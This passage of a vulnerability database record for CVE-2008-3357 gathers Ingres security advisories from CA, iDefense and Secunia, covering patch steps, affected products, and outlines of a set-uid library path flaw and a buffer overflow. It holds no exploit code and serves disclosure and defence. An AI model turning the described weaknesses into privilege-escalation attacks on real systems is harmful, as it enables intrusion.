$II_SYSTEM/ingres/files/config.dat and \n $II_SYSTEM/ingres/files/symbol.tbl files from the copies made \n in step 6 to replace the existing files. \n16. Start Ingres using the \u2018ingstart\u0027 utility:\n ingstart\n17. Upgrade the databases in the installation to the new release \n level:\n upgradedb -all\n\nLinux:\n1. Log on to the machine as \u2018root\u0027. \n2. Copy the downloaded build update file and to a previously \n chosen directory and uncompress. \n3. Read in the update file with the following command:\n tar xf [update file]\n This creates a directory containing rpm packages for all of \n the Ingres tools. \n4. Shut down any non-Ingres application(s) that may be connected \n to or using any of the files in the specified Ingres instance. \n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Important: Take an operating system backup of the \n $II_SYSTEM/ingres directory and other DATA locations that you \n may have elsewhere. \n7. From the directory that was created in step 3, install the \n update rpms with the following command:\n rpm \u2013Uvh *.rpm\n If the following error is seen for either the \n \u2018ca-ingres-documentation-3.0.3-103\u0027, the \n \u2018ca-ingres-CATOSL-3.0.3-103\u0027 or the \n \u2018ca-cs-utils-11.0.04348-0000\u0027 (or all of them) packages,\n remove them from the directory containing the rpms and \n re-run the above command:\n package \u003cpackage-name\u003e is already installed\n8. If the installation finishes successfully, then log on as \n \u2018ingres\u0027 to the machine and start Ingres using the \u2018ingstart\u0027 \n utility:\n ingstart\n9. Upgrade \u2018mdb\u0027 database with the following command:\n upgradedb -all\n\nFor these products:\nCA ARCserve Backup for Unix r11.1\nCA ARCserve Backup for Unix r11.5 GA/SP1/SP2\nCA ARCserve Backup for Unix r11.5 SP3\nCA ARCserve Backup for Linux r11.1\nEEM 8.1\neTrust Audit/SCC 8.0 sp2\nNSM 3.0 0305\nNSM 3.1 0403\nNSM r3.1 SP1 0703\nUnicenter Service Catalog r2.2\nUnicenter ServicePlus Service Desk 6.0\n\nApply the update below that is listed for your platform (note that \nURLs may wrap):\n\nAIX 32bit [2.6/xxxx (rs4.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z\n\nAIX 64bit [2.6/xxxx (r64.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z\n\nHP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3\nhttps://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277\u0026os=HP\u0026actionID=3\n\nHP-UX Itanium [2.6/xxxx (i64.hpu/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z\n\nHP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z\n\nHP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z\n\nHP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z\n\nHP Tru64 UNIX [2.6/xxxx (axp.osf/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z\n\nLinux AMD64 [2.6/xxxx (a64.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)LFS]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z\n\nLinux Itanium [2.6/xxxx (i64.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z\n\nLinux S/390 [2.6/xxxx (ibm.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z\n\nSolaris SPARC 32bit [2.6/xxxx (su4.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z\n\nSolaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z\n\nSolaris SPARC 64bit [2.6/xxxx (su9.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z\n\nIngres 2.6 Vulnerability Updates Install Steps (August 1, 2008)\n\nUnix/Linux:\n1. Log on to your system using the installation owner account and \n make sure the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres system files\n 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility \n directories. \n2. Change directory to the root directory of the Ingres \n installation or use a previously created directory. \n cd $II_SYSTEM/ingres\n or\n cd \u003cpatch_directory\u003e\n3. Copy the download maintenance update file in to the current \n directory and uncompress\n4. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This will create the directory:\n $II_SYSTEM/ingres/patchXXXXX\n or\n \u003cpatch_directory\u003e/patchXXXXX\n Note: \u2018XXXXX\u0027 in patchXXXXX refers to the update number\n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Change directory to the patch directory:\n cd patchXXXXX\n7. Within the patch directory run the following command:\n ./utility/iiinstaller\n Please check the $II_SYSTEM/ingres/files/patch.log file to \n make sure the patch was applied successfully. Also check the \n $II_SYSTEM/ingres/version.rel to make sure the patch is \n referenced. \n Note: The patch can also be installed silently using the \n \u2018-m\u0027 flag with iiinstaller:\n ./utility/iiinstaller -m\n8. Once the patch install has been complete, re-link the iimerge \n binary with the following command:\n iilink\n9. Ingres can then be restarted with the \u2018ingstart\u0027 utility:\n ingstart\n\n\nHow to determine if you are affected:\n\nFor these products:\nAdmin r8.1 SP2\nARCserve for Linux r11.5 SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nEEM 8.2\nEEM 8.2.1\nIdentity Manager r12\nNSM r11\nUnicenter Asset Management r11.1\nUnicenter Asset Management r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk r11\nUnicenter ServicePlus Service Desk r11.1\nUnicenter ServicePlus Service Desk r11.2\nUnicenter Software Delivery r11.1\nUnicenter Software Delivery r11.2\nUnicenter Workload Control Center r11\n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nHP Sparc 32/64bit II 3.0.3 (hp2.us5/211)\nHP Itanium II 3.0.3 (i64.hpu/211)\nIntel Solaris 32/64bit II 3.0.3 (a64.sol/211)\nAIX 32/64bit II 3.0.3 (r64.us5/211)\nSolaris 32/64bit II 3.0.3 (su9.us5/211)\nAMD Linux II 3.0.3 (a64.lnx/211)\nIntel Linux II 3.0.3 (int.lnx/103)\nItanium Linux II 3.0.3 (i64.lnx/211)\n\nNotes:\n1. You would need to install the Ingres build instead of the patch \n if either of the following is true:\n 1. If the Ingres release for your platform is not 3.0.3 in \n the release identifier\n or\n 2. The Ingres release is 3.0.3 but the build level is not \n 103 for Linux and 211 for all the Unix platforms. \n If either of the above is true then download and apply the \n latest build for your operating system(s). \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n\nFor these products:\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nARCserve for Linux r11.5 GA/SP1\nCleverPath Aion BPM r10.1\nCleverPath Aion BPM r10.2\n\nThe maintenance updates are provided for the latest r3 builds \nsupported by CA which are 3.0.3/103 (Linux) and 3.03/211 (UNIX \nplatforms). If the build embedded is earlier than 3.0.3, it has \nto be upgraded to 3.0.3 to fix the vulnerabilities. \n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nHP Sparc 32/64bit II 3.0.3 (hp2.us5/211)\nHP Itanium II 3.0.3 (i64.hpu/211)\nIntel Solaris 32/64bit II 3.0.3 (a64.sol/211)\nAIX 32/64bit II 3.0.3 (r64.us5/211)\nSolaris 32/64bit II 3.0.3 (su9.us5/211)\nAMD Linux II 3.0.3 (a64.lnx/211)\nIntel Linux II 3.0.3 (int.lnx/103)\nItanium Linux II 3.0.3 (i64.lnx/211)\n\nImportant:\nFor Linux (AMD, Intel and Itanium) platforms, after applying the \nbuild provided on this page, please download and apply the \nmaintenance update. For the other platforms, the builds are \npatched to the latest maintenance update. \nNote:\n1. If the release you are using is already 3.0.3 build 103 on \n Linux and 3.0.3 build 211 on Unix, then download and install \n the maintenance update. \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n\nFor these products:\nCA ARCserve Backup for Unix r11.1\nCA ARCserve Backup for Unix r11.5 GA/SP1/SP2\nCA ARCserve Backup for Unix r11.5 SP3\nCA ARCserve Backup for Linux r11.1\nEEM 8.1\neTrust Audit/SCC 8.0 sp2\nNSM 3.0 0305\nNSM 3.1 0403\nNSM r3.1 SP1 0703\nUnicenter Service Catalog r2.2\nUnicenter ServicePlus Service Desk 6.0\n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nAIX 32bit II 2.6/xxxx (rs4.us5/00)\nAIX 64bit II 2.6/xxxx (r64.us5/00)\nHP-UX Itanium II 2.6/xxxx (i64.hpu/00)\nHP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)\nHP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)DBL\nHP-UX RISC 64bit II 2.6/xxxx (hp2.us5/00)\nHP Tru64 UNIX II 2.6/xxxx (axp.osf/00)\nLinux AMD64 II 2.6/xxxx (a64.lnx/00)\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)DBL\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)LFS\nLinux Itanium II 2.6/xxxx (i64.lnx/00)\nLinux S/390 II 2.6/xxxx (ibm.lnx/00)\nSolaris SPARC 32bit II 2.6/xxxx (su4.us5/00)\nSolaris SPARC 32bit double II 2.6/xxxx (su4.us5/00)DBL\nSolaris SPARC 64bit II 2.6/xxxx (su9.us5/00)\n\nNote:\n1. If the Ingres release embedded in your product is not 2.6, \n please get the appropriate update here. \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n3. For HP-UX platform with CA ARCserve Backup 11.1 or \n 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, \n RO01277:\n https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277\u0026os=HP\u0026actionID=3\n and follow the enclosed instructions to install the security \n patch. \n\n\nWorkaround: None\n\n\nReferences (URLs may wrap):\nCA Support:\nhttp://support.ca.com/\nSecurity Notice for CA Products That Embed Ingres\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989\nSolution Document Reference APARs:\nRO01277 (ARCserve only)\nCA Security Response Blog posting:\nCA Products That Embed Ingres Multiple Vulnerabilities\ncommunity.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx\nReported By: \niDefense Labs\nIngres Database for Linux verifydb Insecure File Permissions \n Modification Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731\nIngres Database for Linux libbecompat Stack Based Buffer Overflow \n Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732\nIngres Database for Linux ingvalidpw Untrusted Library Path \n Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733\nIngres\nSecurity Vulnerability Announcement as of August 01, 2008\nhttp://www.ingres.com/support/security-alert-080108.php\nCVE References:\nCVE-2008-3356 - Ingres verifydb file create permission override. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356\nCVE-2008-3357 - Ingres un-secure directory privileges with utility \n ingvalidpw. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357\nCVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389\nOSVDB References: Pending\nhttp://osvdb.org/\n\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\n\nCustomers who require additional information should contact CA\nTechnical Support at http://support.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to our product security response team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2008 CA. All rights reserved. iDefense Security Advisory 08.01.08\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nAug 01, 2008\n\nI. BACKGROUND\n\nIngres Database is a database server used in several Computer\nAssociates\u0027 products. For example, CA Directory Service use thes Ingres\nDatabase server. More information can be found on the vendor\u0027s website\nat the following URL. \n\nhttp://ingres.com/downloads/prod-cert-download.php\n\nII. \n\nThe vulnerability exists within the \"ingvalidpw\" utility included with\nIngres database. This utility is used to verify a user\u0027s credentials,\nand is installed set-uid root. When loading shared libraries, the\n\"ingvalidpw\" program will load libraries from a directory owned by the\n\"ingres\" user. \n\nIII. By itself, this is not that\nserious of a vulnerability. \n\nIV. DETECTION\n\niDefense has confirmed the existence of this vulnerability in Ingres\n2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other\nversions may also be affected. \n\nV. WORKAROUND\n\niDefense is currently unaware of any workarounds for this issue. \n\nVI. VENDOR RESPONSE\n\n\"This problem has been identified and resolved by Ingres in the\nfollowing releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release\n1 (9.0.4), and Ingres 2.6.\"\n\nFor more information, refer to Ingres\u0027 advisory at the following URL. \n\nhttp://www.ingres.com/support/security-alert-080108.php\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2008-3357 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n07/20/2007 Initial vendor response\n07/23/2007 Initial vendor notification\n08/01/2008 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2008 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. ----------------------------------------------------------------------\n\nWant a new job?\n\nhttp://secunia.com/secunia_security_specialist/\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\n\nInternational Partner Manager - Project Sales in the IT-Security\nIndustry:\nhttp://corporate.secunia.com/about_secunia/64/\n\n----------------------------------------------------------------------\n\nTITLE:\nIngres Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA31357\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/31357/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nPrivilege escalation\n\nWHERE:\nLocal system\n\nSOFTWARE:\nIngres 2.x\nhttp://secunia.com/product/14576/\nIngres 2006 (9.x)\nhttp://secunia.com/product/14574/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Ingres, which can be\nexploited by malicious, local users to gain escalated privileges. \n\n1) An error exists in the \"verifydb\" utility due to improperly\nchanging permissions on files and having the setuid-bit set (owned by\nthe \"ingres\" user). \n\n2) A boundary error exists within the \"libbecompat\" library that is\nused by several of the setuid \"ingres\" utilities. This can be\nexploited to cause a stack-based buffer overflow e.g. via a specially\ncrafted environmental variable. \n\nSOLUTION:\nThe vendor has issued fixes. Please see the knowledge base document\n(customer login required). \nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:416012+HTMPL=kt_document_view.htmpl\n\nPROVIDED AND/OR DISCOVERED BY:\nAn anonymous researcher, reported via iDefense. \n\nORIGINAL ADVISORY:\nIngres:\nhttp://www.ingres.com/support/security-alert-080108.php\n\niDefense:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3357"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"db": "BID",
"id": "30512"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68786"
},
{
"db": "PACKETSTORM",
"id": "68816"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-3357",
"trust": 2.9
},
{
"db": "BID",
"id": "30512",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "31398",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "31357",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2008-2313",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2008-2292",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1020614",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004682",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200808-049",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "68897",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68872",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68786",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68816",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68786"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
},
{
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"id": "VAR-200808-0319",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:56:59.093000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "contentID=181989",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-426",
"trust": 1.0
},
{
"problemtype": "CWE-264",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"trust": 2.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733"
},
{
"trust": 2.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=181989"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/31398"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/31357"
},
{
"trust": 1.6,
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/30512"
},
{
"trust": 1.6,
"url": "http://securitytracker.com/id?1020614"
},
{
"trust": 1.6,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44181"
},
{
"trust": 1.6,
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3357"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-3357"
},
{
"trust": 0.5,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"trust": 0.5,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/495177"
},
{
"trust": 0.2,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/31357/"
},
{
"trust": 0.2,
"url": "http://corporate.secunia.com/about_secunia/64/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3357"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7126/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5912/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/31398/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19467/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7129/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14437/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5904/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14602/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19468/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5905/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1684/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7120/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19466/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7114/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/solndtls?aparno=ro01277\u0026os=hp\u0026actionid=3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3356"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3389"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=177782"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3356"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3389"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://ingres.com/downloads/prod-cert-download.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:416012+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14576/"
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68786"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
},
{
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68786"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
},
{
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-01T00:00:00",
"db": "BID",
"id": "30512"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"date": "2008-08-08T18:43:59",
"db": "PACKETSTORM",
"id": "68897"
},
{
"date": "2008-08-06T21:42:18",
"db": "PACKETSTORM",
"id": "68872"
},
{
"date": "2008-08-04T19:11:26",
"db": "PACKETSTORM",
"id": "68786"
},
{
"date": "2008-08-04T23:14:27",
"db": "PACKETSTORM",
"id": "68816"
},
{
"date": "2008-08-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-049"
},
{
"date": "2008-08-05T19:41:00",
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-06T20:26:00",
"db": "BID",
"id": "30512"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"date": "2020-09-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-049"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68786"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
